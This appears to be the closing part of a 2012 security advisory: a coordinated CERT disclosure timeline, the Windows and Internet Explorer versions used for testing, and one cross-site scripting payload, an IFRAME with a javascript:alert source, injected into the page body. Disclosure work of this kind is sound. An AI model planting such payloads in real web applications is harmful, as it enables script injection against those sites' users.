Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: Coordinated details with vendor
08 Aug 2012: Public Disclosure
Installed On: Windows Server 2003 SP2
Client Test OS: Window XP Pro SP3 (x86)
Browser Used: Internet Explorer 8
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9
Injection Point: Body
Injection Payload(s):
1: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>